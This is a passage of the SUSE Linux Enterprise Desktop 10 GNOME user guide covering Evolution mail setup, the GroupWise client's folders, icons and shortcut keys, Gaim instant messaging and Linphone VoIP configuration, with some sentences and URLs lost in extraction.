SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
2 Select if you want to apply filters to new messages in the Inbox. 3 Click Forward. When you have finished, continue with Sending Mail. Standard Unix Mbox Spool or Directory Receiving Options If you select Standard Unix Mbox Spool or Directory as your receiving server type, you need to specify the following options: 1 Select if you want Evolution to automatically check for new mail. If you select this option, you need to specify how often Evolution should check for new messages. 2 Select if you want to apply filters to new messages in the Inbox. 3 Select if you want to store status headers in Elm, Pine, and Mutt formats. 4 Click Forward. When you have finished, continue with Sending Mail Sending Mail. Sending Mail Now that you have entered information about how you plan to get mail, Evolution needs to know about how you want to send it. 1 Select a server type from the Server Type list. an outbound mail server. This is the most common choice for sending mail. If you choose SMTP, there are additional configuration options. SMTP Configuration 1 Type the host address in the Host field. If you are unsure what your host address is, contact your system administrator. 2 Select if your server requires authentication. If you selected that your server requires authentication, you need to provide the following information: 2a Select your authentication type in the Authentication list. or Click Check for Supported Types to have Evolution check for supported types. Some servers do not announce the authentication mechanisms they support, so clicking this button is not a guarantee that available mechanisms actually work. 2b Type your username in the Username field. 2c Select if you want Evolution to remember your password.
Evolution: E-Mail and Calendaring
91
novdocx (ENU) 01 February 2006
3 Select if you use a secure connection (SSL). 4 Click Forward. Continue with Account Management. Account Management Now that you have finished the e-mail configuration process you need to give the account a name. The name can be any name you prefer. Type your account name on the Name field, then click Forward. Continue with Time Zone. Time Zone In this step, you need to select your time zone either on the map or select from the time zone dropdown list. When you have finished, click Forward, then click Apply. Evolution opens with your new account created. If you want to import e-mail from another e-mail client, continue with Importing Mail (Optional). If not, skip to “Using Evolution: An Overview” on page 93. Importing Mail (Optional) If Evolution finds e-mail or address files from another application, it offers to import them. Microsoft Outlook* and versions of Outlook Express after version 4, use proprietary formats that Evolution cannot read or import. To import information, you might want to use the Export tool under Windows*. Before importing e-mail from Netscape*, make sure you have selected File > Compact All Folders. If you don’t, Evolution will import and undelete the messages in your Trash folders. NOTE: Evolution uses standard file types for e-mail and calendar information, so you can copy those files from your ~/.evolution directory. The file formats used are mbox for e-mail and iCal for calendar information. Contacts files are stored in a database, but can be saved as a standard vCard*. To export contact data, open your contacts tool and select the contacts you want to export (press Ctrl+A to select them all). Click File > Save as VCard.
92
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
4.2 Using Evolution: An Overview
Now that the first-run configuration has finished, you’re ready to begin using Evolution. Here’s a quick explanation of what’s happening in your main Evolution window.
Figure 4-1 Evolution Window
Menu Bar The menu bar gives you access to nearly all of Evolution features. Folder List The folder list gives you a list of the available folders for each account. To see the contents of a folder, click the folder name and the contents are displayed in the e-mail list. Toolbar The toolbar gives you fast and easy access to the frequently used features in each component. Search Tool The search tool lets you search your e-mail, contacts, calendar, and tasks to easily find what you’re looking for. Message List The message list displays a list of e-mail that you have received. To view an e-mail in the preview pane, click the e-mail in the e-mail list.
Evolution: E-Mail and Calendaring
93
novdocx (ENU) 01 February 2006
Shortcut Buttons The shortcut bar lets you switch between folders and between Evolution tools. At the bottom of the shortcut bar there are buttons that let you switch tools, and above that is a list of all the available folders for the current tool. If you have the Evolution Connector for Microsoft Exchange installed, you have an Exchange button in addition to buttons for the other tools. Status Bar The status bar periodically displays a message, or tells you the progress of a task. This most often happens when you’re checking or sending e-mail. These progress queues are shown in the previous figure. The Online/Offline indicator is here, too, in the lower left of the window. Preview Pane The preview pane displays the contents of the e-mail that is selected in the e-mail list.
4.2.1 The Menu Bar
The menu bar’s contents always provide all the possible actions for any given view of your data. If you’re looking at your Inbox, most of the menu items relate to e-mail. Some content relates to other components of Evolution and some, especially those in the File menu, relates to the application as a whole. File: Anything related to a file or to the operations of the application usually falls under this menu, such as creating things, saving them to disk, printing them, and quitting the program itself. Edit: Holds useful tools that help you edit text and move it around. Lets you access the settings and configuration options in the Edit menu. View: Lets you decide how Evolution should look. Some of the features control the appearance of Evolution as a whole, and others the way a particular kind of information appears. Folder: Holds actions that can be performed on folders. You can find things like copy, rename, delete, and so on. Message: Holds actions that can be applied to a message. If there is only one target for the action, such as replying to a message, you can normally find it in the Message menu. Search: Lets you search for messages, or for phrases within a message. You can also see previous searches you have made. In addition to the Search menu, there is a text entry box in the toolbar that you can use to search for messages. You can also create a search folder from a search. Help: Opens the Evolution Help files.
4.2.2 The Shortcut Bar
Evolution’s most important job is to give you access to your information and help you use it quickly. One way it does that is through the shortcut bar, which is the column on the left side of the main window. The buttons, such as Mail and Contacts, are the shortcuts. Above them is a list of folders for the current Evolution tool. The folder list organizes your e-mail, calendars, contact lists, and task lists in a tree, similar to a file tree. Most people find one to four folders at the base of the tree, depending on the tool and their
94
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
system configuration. Each Evolution tool has at least one, called On This Computer, for local information. For example, the folder list for the e-mail tool shows any remote e-mail storage you have set up, plus local folders and search folders. If you get large amounts of e-mail, you might want more folders than just your Inbox. You can create multiple calendar, task, or contacts folders. To create a new folder: 1 Click Folder > New. 2 Type the name of the folder in the Folder Name field. 3 Select the location of the new folder. 4 Click OK. Folder Management Right-click a folder or subfolder to display a menu with the following options: Copy: Copies the folder to a different location. When you select this item, Evolution offers a choice of locations to copy the folder to. Move: Moves the folder to another location. Mark Messages As Read: Marks all the messages in the folder as read. New Folder: Creates another folder in the same location. Delete: Deletes the folder and all its contents. Rename: Lets you change the name of the folder. Disable: Disables the account. Properties: Checks the number of total and unread messages in a folder, and, for remote folders, lets you select whether to copy the folder to your local system for offline operation. You can also rearrange folders and messages by dragging and dropping them. Any time new e-mail arrives in a e-mail folder, that folder label is displayed in bold text, along with the number of new messages in that folder.
4.2.3 E-Mail
Evolution e-mail is like other e-mail programs in several ways: • It can send and receive e-mail in HTML or as plain text, and makes it easy to send and receive multiple file attachments. • It supports multiple e-mail sources, including IMAP, POP3, and local mbox or mh spools and files created by other e-mail programs. • It can sort and organize your e-mail in a wide variety of ways with folders, searches, and filters. • It lets you guard your privacy with encryption. However, Evolution has some important differences from other e-mail programs. First, it’s built to handle very large amounts of e-mail. The junk e-mail, message filtering and searching functions
Evolution: E-Mail and Calendaring
95
novdocx (ENU) 01 February 2006
were built for speed and efficiency. There’s also the search folder, an advanced organizational feature not found in some e-mail clients. If you get a lot of e-mail, or if you keep every message you get in case you need to refer to it later, you’ll find this feature especially useful. Here’s a quick explanation of what’s happening in your main Evolution e-mail window. Message List The message list displays all the e-mails that you have. This includes all your read and unread messages, and e-mail that is flagged to be deleted. Preview Pane, including moving or deleting them, creating filters or search folders based on them, and marking them as junk mail. Most of the e-mail-related actions you want to perform are listed in the Actions menu in the menu bar. The most frequently used ones, like Reply and Forward, also appear as buttons in the toolbar. Most of them are also located in the right-click menu and as keyboard shortcuts.
4.2.4 The Calendar
To begin using the calendar, click Calendar in the shortcut bar. By default, the calendar shows today’s schedule on a ruled background. At the upper right, there’s a monthly calendar you can use to switch days. Below that, there’s a Task list, where you can keep a list of tasks separate from your calendar appointments. Appointment List The appointment list displays all your scheduled appointments. Month Pane The month pane is a small view of a calendar month. To display additional months, drag the column border to the left. You can also select a range of days in the month pane to display a custom range of days in the appointment list. Task List Tasks are distinct from appointments because they generally don’t have times associated with them. You can see a larger view of your task list by clicking Tasks in the shortcut bar.
4.2.5 The Contacts Tool
The Evolution contacts tool can handle all of the functions of an address book or phone book. However, it’s easier to update Evolution than it is to change an actual paper book, in part because Evolution can synchronize with Palm OS* devices and use LDAP directories on a network.
96
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Another advantage of the Evolution contacts tool is its integration with the rest of the application. For example, you can right-click on an e-mail address in Evolution mail to instantly create a contact entry. To use the contacts tool, click Contacts in the shortcut bar. By default, the display shows all your contacts in alphabetical order, in a minicard view. You can select other views from the View menu, and adjust the width of the columns by clicking and dragging the gray column dividers. The largest section of the contacts display shows a list of individual contacts. You can also search the contacts in the same way that you search e-mail folders, using the search tool on the right side of the toolbar.
Evolution: E-Mail and Calendaring
97
novdocx (ENU) 01 February 2006
98
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
GroupWise Linux Client: E-Mailing and Calendaring
5
5
GroupWise® is a robust, dependable messaging and collaboration system that connects you to your universal mailbox anytime and anywhere. This section gives you an introductory overview of the GroupWise client to help you start using the GroupWise Cross-Platform client quickly and easily. • Section 5.1, “Getting Acquainted with the Main GroupWise Window,” on page 99 • Section 5.2, “Using Different GroupWise Modes,” on page 104 • Section 5.3, “Understanding Your Mailbox,” on page 105 • Section 5.4, “Using the Toolbar,” on page 107 • Section 5.5, “Using Shortcut Keys,” on page 107 • Section 5.6, “Learning More,” on page 109
5.1 Getting Acquainted with the Main GroupWise Window
Your main work area in GroupWise is called the Main Window. From the Main Window of GroupWise, you can read your messages, schedule appointments, view your Calendar, manage
GroupWise Linux Client: E-Mailing and Calendaring
99
novdocx (ENU) 01 February 2006
contacts, change the mode of GroupWise you’re running in, open folders, open documents, and much more.
Figure 5-1 Groupwise Main Window
You can open more than one Main Window in GroupWise by clicking Window, then clicking New Main Window. This is useful if you proxy for another user. You can look at your own Main Window and the Main Window belonging to the person you are proxying for. You might also want to open a certain folder in one window and look at your Calendar in another. You can open as many Main Windows as your computer’s memory allows. The basic components of the Main Window are explained below.
5.1.1 Toolbar
The toolbar lets you quickly accomplish common GroupWise tasks, such as opening the Address Book, sending mail messages, and finding an item. For information about the toolbar, see Section 5.4, “Using the Toolbar,” on page 107.
5.1.2 Folder and Item List Header
The Folder and Item List header provides a drop-down list where you can select the mode of GroupWise you want to run (Online or Caching), select to open your archived or backup mailbox, and select a proxy mailbox.
100 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
5.1.3 Folder List
The Folder List at the left of the Main Window lets you organize your GroupWise items. You can create new folders to store your items in. Next to any folder (except for shared folders), the number of unread items is shown in square brackets. Next to the Sent Items folder, the number in square brackets shows how many items are pending to be sent from Caching mode. Here is what you’ll find in each of the default folders: • “User Folder” on page 101 • “Mailbox Folder” on page 101 • “Sent Items Folder” on page 101 • “Calendar Folder” on page 102 • “Contacts Folder” on page 102 • “Checklist Folder” on page 102 • “Documents Folder” on page 103 • “Trash Folder” on page 103 • “Shared Folders” on page 103 User Folder Your user folder (indicated by your name) represents your GroupWise database. All folders in you Main Window are subfolders of your user folder. Mailbox Folder The Mailbox displays all the items you have received, with the exception of scheduled items (appointments, tasks, and reminder notes) you have accepted or declined. Accepted scheduled items are moved to the Calendar. Sent Items Folder The Sent Items folder displays all sent items from the Mailbox and Calendar. The Sent Items folder in versions prior to GroupWise 6.5 was a query folder, which had some differences from the current Sent Items folder. The following is a comparison between the previous Sent Items query folder and the current Sent Items folder.
Table 5-1 Comparison Between Sent Items Query Folder and Sent Items Folder
Sent Items Folder (Current)
Sent Items Query Folder (Previous)
All sent items reside in this folder unless they are moved to a folder other than the Mailbox or Calendar. If a sent item is moved to another folder, it no longer displays in the Sent Items folder.
No items actually reside in this folder. This folder is a Find Results folder, which means a Find is performed when you click the folder and the results of the Find (all sent items) are displayed in the folder. If you delete an item from this folder, the original item remains in its original folder and redisplays the next time you open this folder.
GroupWise Linux Client: E-Mailing and Calendaring 101
novdocx (ENU) 01 February 2006
Sent Items Folder (Current)
Sent Items Query Folder (Previous)
You can resend, reschedule, and retract sent items from this folder.
You can resend, reschedule, and retract sent items from this folder.
Calendar Folder The Calendar folder Contacts Folder The Contacts folder , by default, represents the Frequent Contacts address book in the Address Book. Any modification you make in the Contacts Folder is also made in the Frequent Contacts address book. From this folder, you can view, create and modify contacts, resources, organizations and groups. Your proxies never see your Contacts folder. Checklist Folder Use the Checklist folder to create a task list. You can move any items (mail messages, phone messages, reminder notes, tasks, or appointments) to this folder and arrange them in the order you want. Each item is marked with a check box so that you can check items off as you complete them. The following is a comparison between the Checklist folder and the Task List query folder (found in previous versions of GroupWise).
Table 5-2 Comparison Between Checklist Folder and Task List Folder
shows several calendar view options.
Checklist Folder
Task List Folder
This folder contains the following items: • Items you have moved to this folder • Items you have posted to this folder • Items that are part of a checklist that you have created in another folder Any item type can reside in this folder. To mark an item completed, click the check box next to the item in the Item List.
No items actually reside in this folder. This folder is a Find Results folder, which means a Find is performed when you click the folder and the results of the Find (all scheduled tasks) are displayed in the folder. If you delete an item from this folder, the original item remains in its original folder and redisplays the next time you open this folder. Only tasks show in this folder. Tasks are scheduled items that are associated with a due date. To mark an item completed, open the item, then click Completed. Due dates are set by the person who sent you the task. If you post a task for yourself, you can set a due date. To set the priority of an item, open the item, then type a priority in the Priority field.
Checklist items do not display in the Task List of the Calendar.
Tasks display in the Task List of the Calendar and can be marked Completed from the Calendar.
102 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Checklist Folder
Task List Folder
Tasks that are past due show as red in the Calendar.
Documents Folder Your document references are organized in the Documents folder so you can locate them easily.
The Documents folder can contain only documents. If any other type of item is moved to this folder by a GroupWise client older than version 5.5, the item is deleted. Cabinet Folder The Cabinet contains all your personal folders. You can rearrange and nest folders by clicking Edit > Folders. You can change how the folders are sorted by right-clicking the Cabinet folder, clicking Properties, then selecting what you want to sort by. Junk Mail Folder All e-mail items from addresses and Internet domains that are junked through Junk Mail Handling are placed in the Junk Mail folder . This folder is not created in the folder list unless a Junk Mail option is enabled. While Junk Mail options are enabled, this folder cannot be deleted. However, the folder can be renamed or moved to a different location in the folder list. If all Junk Mail options are disabled, the folder can be deleted. The folder can also be deleted if the Junk Mail Handling feature is disabled by the system administrator. To delete items from the Junk Mail Folder, right-click the folder, click Empty Junk Mail Folder, then click Yes. Trash Folder All deleted mail and phone messages, appointments, tasks, documents, and reminder notes are stored in the Trash folder . Items in the Trash can be viewed, opened, or returned to your Mailbox before the Trash is emptied. (Emptying the Trash removes items in the Trash from the system.) You can empty your entire Trash, or empty only selected items. Items in the Trash are automatically emptied according to the number days entered in the Cleanup tab in Environment Options, or you can empty the Trash manually. The system administrator might specify that your Trash is emptied automatically on a regular basis. Shared Folders A shared folder is like any other folder in your Cabinet, except other people have access to it. You can create shared folders or share existing personal folders in your Cabinet. You choose whom to share the folder with, and what rights to grant each user. Then, users can post messages to the shared folder, drag existing items into the folder, and create discussion threads. You can’t share system folders, which include the Cabinet, Trash, and Work In Progress folders.
GroupWise Linux Client: E-Mailing and Calendaring 103
novdocx (ENU) 01 February 2006
5.1.4 Item List
The Item List on the right side of the Main Window displays your mail and phone messages, appointments, reminder notes, tasks, and document references. You can sort the Item List by clicking a column heading. To reverse the sort order, click the column heading a second time. For information about the icons used with different items, see “Icons Appearing Next to Items in Your Mailbox and Calendar” on page 105.
5.1.5 QuickViewer
The QuickViewer opens below the Folder and Item List. You can quickly scan items and their attachments in the QuickViewer rather than open each item in another window.
5.2 Using Different GroupWise Modes
GroupWise provides two different ways to run the GroupWise client: Online mode and Caching mode. You might be able to run GroupWise in either mode, or your system administrator might require that you use only a certain mode. Most GroupWise features are available in all both GroupWise modes, with some exceptions. Subscribing to other users’ notifications is not available in Caching mode.
5.2.1 Online.
5.2.2 Caching Mode..
104 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
5.3 Understanding Your Mailbox. You can organize your messages by moving them into folders within your Cabinet, and you can create new folders as necessary.
5.3.1 Bolded Items in Your Mailbox
All unopened items in your Mailbox are bolded to help you easily identify which items and documents you have not yet read. The icon appearing next to an item also indicates if it is unopened. Sent items are also bolded to show when they are queued but not uploaded, status information has not been received about the item being delivered, or they have not yet been transferred to the Internet.
5.3.2 Icons Appearing Next to Items in Your Mailbox and Calendar
The icons that appear next to items in your Mailbox and Calendar show information about the items. The following table explains what each icon means.
Table 5-3 Icon Descriptions
Icon
Description
Next to an item you have sent in Caching mode, the icon indicates that the item has been queued, but the queue has not been uploaded. After the item has been uploaded, this icon indicates that status information has not been received about the item being delivered to the destination post office or transferred to the Internet. Next to the Sent Items folder, the icon indicates that there is at least one item that has been queued but has not been uploaded. Appears next to an item you have sent. If the item has been opened by at least one person, this icon appears until all recipients have 1) opened the mail, phone message, or reminder note; 2) accepted the appointment; or 3) completed the task. Appears next to an item you have sent. The item couldn’t be delivered to the destination post office or it failed to transfer to the Internet. Appears next to an item you have sent. Next to an appointment or task, this icon indicates that at least one person has declined/deleted the item. Next to a mail message, phone message, or reminder note, this icon indicates that at least one person has deleted the item without opening it. One or more attachments are included with the item. One or more sound annotations are included with the item, or the item is a voice mail message. Draft item.
GroupWise Linux Client: E-Mailing and Calendaring 105
novdocx (ENU) 01 February 2006
Icon
Description
Appears next to an item you have sent. Appears next to an item you have replied to. Appears next to an item you have forwarded. Appears next to an item you have delegated. Appears next to an item you have replied to and forwarded Appears next to an item you have replied to and delegated. Appears next to an item you have forwarded and delegated. Appears next to an item you have replied to, forwarded, and delegated Posted item. Specific version of a document. Official version of a document. Unopened mail message with a low, standard, or high priority. Opened mail message with a low, standard, or high priority. Unopened appointment with a low, standard, or high priority. Opened appointment with a low, standard, or high priority. Unopened task with a low, standard, or high priority. Opened task with a low, standard, or high priority. Unopened reminder note with a low, standard, or high priority. Opened reminder note with a low, standard, or high priority. Unopened phone message with a low, standard, or high priority. Opened phone message with a low, standard, or high priority. The sender has requested that you reply to this item. The item can be a low, standard, or high priority. Appears in a Busy Search. If it appears to the left of a username or resource, you can click a scheduled time across from the username or resource on the Individual Schedules tab to display more information about the appointment in the box below. However, the user or resource owner must give you appointment Read rights in the Access List before this icon appears. Appears on your Calendar, indicates an alarm is set for the item. Appears on your Calendar, indicates the item is a group appointment, reminder note, or task. Appears on your Calendar, indicates the item is marked private. Appears on your Calendar, indicates that you declined the item but didn’t delete it.
106 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
5.4 Using the Toolbar
Use the toolbar to access many of the features and options found in GroupWise. The toolbar at the top of a folder or item is context sensitive; it changes to provide the options you need most in that location.
5.5 Using Shortcut Keys
You can use a number of shortcut keys in GroupWise for accessibility or to save time when you perform various operations. The table below lists some of these keystrokes, what they do, and the context where they work.
Table 5-4 Shortcut Keys
Keystroke
Action
Where It Works
F1 F2 F5 F7 F8 F9 Ctrl+A Ctrl+B Ctrl+C Ctrl+F Ctrl+G Ctrl+I Ctrl+L Ctrl+M Ctrl+O Ctrl+P Ctrl+Q Ctrl+R Ctrl+S Ctrl+U Ctrl+V Ctrl+X
Open online help Search for text. Refresh the view Opens the Spell Checker Mark the selected item private Open the font dialog box Select all items; select all text Bold text Copy selected text Open the Find dialog box Go to today’s date Italicize text Attach a file to a message Open a new mail message Open the selected message Open the Print dialog box Turn the QuickViewer on and off Mark the selected item unread Save a draft in the Work in Progress folder Underline text Paste selected text Cut selected text
Main Window, Calendar, item, dialog box In an item Main Window, Calendar In an item Item List In an item Item List; text In text In text Main Window, Calendar, item, dialog box Calendar In text In an item Main Window, Calendar, item, dialog box Item List Main Window, item Main Window, Calendar Item List In an item In text In text In text
GroupWise Linux Client: E-Mailing and Calendaring 107
novdocx (ENU) 01 February 2006
Keystroke
Action
Where It Works
Ctrl+Z Ctrl+Up-arrow or Ctrl+Down-arrow Ctrl+Shift+Left-arrow or Ctrl+Shift+Rightarrow Ctrl+Shift+A Ctrl+Shift+T Ctrl+Shift+R Ctrl+Shift+P Alt+F4
Undo the last action Opens the previous or next item
In text In an item
Select text one word at a time
In text
Open a new appointment Open a new task Open a new reminder note Open a new phone message From the Main Window or Calendar, exit GroupWise. From an item, exit the item. From a dialog box, exit the dialog box.
Main Window, Calendar, item, dialog box Main Window, Calendar, item, dialog box Main Window, Calendar, item, dialog box Main Window, Calendar, item, dialog box Main Window, Calendar, item, dialog box
Alt + [letter]
Activate the menu bar (Use the underlined letters in the menu names) Send item Send item Display the properties of the selected item Delete an item Select text one character at a time
Main Window, Calendar, item
Alt+D Alt+S Alt+Enter Alt+Del Shift+Left-arrow or Shift+Right-arrow Shift+End or Shift+Home Shift + [letter]
In a new item In a new item Item List In an item In text
Select text to the end or beginning of a line
In text
In the Folder List, Shift + the first letter of a subfolder name goes to the subfolder. Cycle through fields, buttons, and areas
Folder list
Tab
Main Window, Calendar, dialog box, item
108 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Keystroke
Action
Where It Works
Shift+Tab Ctrl+Tab
Reverse the order of cycling through fields, buttons, and areas In text, indent the text. In a tabbed dialog box, open the next tab.
Main Window, Calendar, dialog box, item In text, dialog box
Alt+Up Arrow Alt+Down Arrow
Zooms in the message body of an item.
In an item
Zooms out the message body of an In an item item.
5.6 Learning More
You can learn more about GroupWise from the following resources: • “Online Help” on page 109 • “GroupWise 7 Documentation Web Page” on page 109 • “GroupWise Cool Solutions Web Community” on page 109
5.6.1 Online Help
Complete user documentation is available in Help. In the Main Window, click Help > Help Topics, then use the Contents tab, Index tab, or Search tab to locate the help topics you want.
5.6.2 GroupWise 7 Documentation Web Page
For the latest version of the GroupWise user guide and for extensive GroupWise administration documentation, go to the GroupWise 7 area on the Novell Documentation Web site (http://). This user guide is also available from the GroupWise client by clicking Help > User Guide.
5.6.3 GroupWise Cool Solutions Web Community
At GroupWise Cool Solutions, you’ll find tips, tricks, feature articles, and answers to frequent questions. In the Main Window, click Help > Cool Solutions Web Community or go to http:// ().
GroupWise Linux Client: E-Mailing and Calendaring 109
novdocx (ENU) 01 February 2006
110 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
6
Instant Messaging with Gaim
6
Use. • Section 6.1, “Supported Protocols,” on page 111 • Section 6.2, “Setting Up an Account,” on page 111 • Section 6.3, “Managing Your Buddy List,” on page 112 • Section 6.4, “Chatting,” on page 112
6.1 Supported Protocols
Gaim supports the following instant messaging protocols: • AIM/ICQ • Gadu-Gadu • GroupWise • IRC • Jabber • MSN • Napster • Yahoo • Zephyr
6.2 Setting Up an Account
To use Gaim, you must already have accounts on the systems you want to use. For example, to use Gaim for your AIM account, you must first have an AIM account. Once you have those accounts, set them up in the Gaim Add Account dialog. 1 Start Gaim by clicking Computer > More Applications > Communicate > Gaim. 2 Click Accounts > Add to open the Add Account dialog. The first time you run Gaim, or any subsequent times you start Gaim when you don’t have any accounts set up, the Add Account dialog opens automatically. 3 Choose the protocol you want to set up. The Add Account dialog differs for each protocol, depending on what setup options are available for that protocol. 4 Enter the setup options for the chosen protocol.
Instant Messaging with Gaim 111
novdocx (ENU) 01 February 2006
Typical options include your account name and password. Your protocol might support additional options, such as a buddy icon, alias, login options, or others. 5 Click Save. 6 Repeat Steps 2 to 5 for each additional protocol. Once an account is added, you can log in to that account by entering your account name and password in the Gaim Login dialog.
6.3 Managing Your Buddy List
Use the Buddy List to manage your contacts, also known as buddies. You can add and remove buddies from your Buddy List, and you can organize your buddies in groups so they are easy to find.
6.3.1 Displaying Buddies in the Buddy List
Once your accounts are set up, all buddies who are online appear in your Buddy List. If you also want your buddies who are not online to appear in the Buddy List, click Buddies > Show Offline Buddies.
6.3.2 Adding a Buddy
To add a buddy to your Buddy List, click Buddies > Add Buddy, then enter the information about that buddy. NOTE: For some protocols, you cannot add a buddy in the Gaim interface. You must use the client for those protocols if you want to add to your buddy list. After you have added a buddy in the protocol’s client, that buddy appears in your Gaim Buddy List.
6.3.3 Removing a Buddy
To remove a buddy, right-click on that buddy’s name in the Buddy List, then click Remove.
6.4 Chatting
To open a chat session, double-click a buddy name in the Buddy List. The Chat screen opens. Type your message, then press Enter to send it. Each chat session you open appears as a tab in the Chat screen. Click on a buddy’s tab to chat with that buddy. Close a chat session by closing the tab for that buddy.
112 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
7
Using Voice over IP
7
Lin.
7.1 Configuring Linphone
Before you start using Linphone there are some basic decisions to make and some configuration tasks to complete. First, determine and configure the run mode of Linphone, determine the connection type to use, then start the Linphone configuration (Go > Preferences) to make the necessary adjustments.
7.1.1 Determining the Run Mode of Linphone
Linphone can be run in two different modes, depending on the type of desktop you run and on its configuration. Normal Application After the Linphone software has been installed, it can be started via the GNOME and KDE application menus or via the command line. When Linphone is not running, incoming calls cannot be received. GNOME Panel Applet Linphone can be added to the GNOME panel. Right-click an empty area in the panel, select Add to Panel, and select Linphone. Linphone is then permanently added to the panel and automatically started on login. As long as you do not receive any incoming calls, it runs in the background. As soon as you get an incoming call, the main window opens and you can receive the call. To open the main window to call someone, just click the applet icon.
7.1.2 Determining the Connection Type
There are several different ways to make a call in Linphone. How you make a call and how you reach the other party is determined by the way you are connected to the network or the Internet. Linphone uses the session initiation protocol (SIP) to establish a connection with a remote host. In SIP, each party is identified by a SIP URL:
sip:username@hostname
username is your login on your Linux machine and hostname the name of the computer you are using. If you use a SIP provider, the URL would look like the following example:
sip:username@sipserver
username is the username chosen when registering at a SIP server. sipserver is the address of the SIP server or your SIP provider. For details on the registration procedure, refer to “Configuring the SIP Options” on page 115 and check the provider's registration documentation. For a list of
Using Voice over IP 113
novdocx (ENU) 01 February 2006
providers suitable for your purpose, check the Web pages mentioned in “For More Information” on page 119. The URL to use is determined by the type of connection you choose. If you chose to call another party directly without any further routing by a SIP provider, you would enter a URL of the first type. If you chose to call another party via a SIP server, you would enter a URL of the second type. Calling in the Same Network If you intend to call a friend or coworker belonging to the same network, you just need the correct username and hostname to create a valid SIP URL. The same applies if this person wants to call you. As long as there is no firewall between you and the other party, no further configuration is required. Calling across Networks or the Internet (Static IP Setup) If you are connected to the Internet using a static IP address, anyone who wants to call you just needs your username and the hostname or IP address of your workstation to create a valid SIP URL, as described in “Calling in the Same Network” on page 114. If you or the calling party are located behind a firewall that filters incoming and outgoing traffic, open the SIP port (5060) and the RTP port (7078) on the firewall machine to enable Linphone traffic across the firewall. Calling across Networks or the Internet (Dynamic IP Setup) If your IP setup is not static—if you dynamically get a new IP address every time you connect to the Internet—it is impossible for any caller to create a valid SIP URL based on your username and an IP address. In these cases, either use the services offered by a SIP provider or use a DynDNS setup to make sure that an external caller gets connected to the right host machine. More information about DynDNS can be found at Wikipedia.org (). Calling across Networks and Firewalls Machines hidden behind a firewall do not reveal their IP address over the Internet. Thus, they cannot be reached directly from anyone trying to call a user working at such a machine. Linphone supports calling across network borders and firewalls by using a SIP proxy or relaying the calls to a SIP provider. Refer to “Configuring the SIP Options” on page 115 for a detailed description of the necessary adjustments for using an external SIP server.
7.1.3 Configuring the Network Parameters
Most of the settings contained in the Network tab do not need any further adjustments. You should be able to make your first call without changing them. NAT Traversal Options Enable this option only if you find yourself in a private network behind a firewall and if you do not use a SIP provider to route your calls. Select the check box and enter the IP address of the firewall machine in dot notation, for example, 192.168.34.166. RTP Properties Linphone uses the real-time transport protocol (RTP) to transmit the audio data of your calls. The port for RTP is set to 7078 and should not be modified, unless you have another application using this port. The jitter compensation parameter is used to control the number of audio packages Linphone buffers before actually playing them. By increasing this parameter,
114 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
you improve the quality of transmission. The more packages buffered, the greater a chance for “late comers” to be played back. On the other hand increasing the number of buffered packages also increases the latency—you hear the voice of your counterpart with a certain delay. When changing this parameter, carefully balance these two factors. Other If you use a combination of VoIP and landline telephony, you might want to use the dual tone multiplexed frequency (DTMF) technology to trigger certain actions, like a remote check of your voice mail just by punching certain keys. Linphone supports two protocols for DTMF transmission, SIP INFO and RTP rfc2833. If you need DTMF functionality in Linphone, choose a SIP provider that supports one of these protocols. For a comprehensive list of VoIP providers, refer to “For More Information” on page 119.
7.1.4 Configuring the Sound Device
Once your sound card has been properly detected by Linux, Linphone automatically uses the detected device as the default sound device. Leave the value of Use sound device as it is. Use Recording source to determine which recording source should be used. In most cases, this would be a microphone (micro). To select a custom ring sound, use Browse to choose one and test your choice using Listen. Click Apply to accept your changes.
7.1.5 Configuring the SIP Options
The SIP dialog contains all SIP configuration settings. SIP Port Determine on which port the SIP user agent should run. The default port for SIP is 5060. Leave the default setting unchanged unless you know of any other application or protocol that needs this port. Identity Anyone who wants to call you directly without using a SIP proxy or a SIP provider needs to know your valid SIP address. Linphone creates a valid SIP address for you. Remote Services This list holds one or more SIP service providers where you have created a user account. Server information can be added, modified, or deleted at any time. See “Adding a SIP Proxy and Registering at a Remote SIP Server” on page 115 to learn about the registration procedure. Authentication Information To register at a remote SIP server, provide certain authentication data, such as a password and username. Linphone stores this data once provided. To discard this data for security reasons, click Clear all stored authentication data. The Remote services list can be filled with several addresses of remote SIP proxies or service providers. Adding a SIP Proxy and Registering at a Remote SIP Server 1 Choose a suitable SIP provider and create a user account there. 2 Start Linphone.
Using Voice over IP 115
novdocx (ENU) 01 February 2006
3 Go to Go > Preferences > SIP. 4 Click Add proxy/registrar to open a registration form. 5 Fill in the appropriate values for Registration Period, SIP Identity, SIP Proxy and Route. If working from behind a firewall, always select Send registration and enter an appropriate value for Registration Period. This resends the original registration data after a given time to keep the firewall open at the ports needed by Linphone. Otherwise, these ports would automatically be closed if the firewall did not receive any more packages of this type. Resending the registration data is also needed to keep the SIP server informed about the current status of the connection and the location of the caller. For SIP identity, enter the SIP URL that should be used for local calls. To use this server also as a SIP proxy, enter the same data for SIP Proxy. Finally, add an optional route, if needed, and leave the dialog with OK.
7.1.6 Configuring the Audio Codecs
Linphone supports a several codecs for the transmission of voice data. Set your connection type and choose your preferred codecs from the list window. Codecs not suitable for your current connection type are red and cannot be selected.
7.2 Testing Linphone
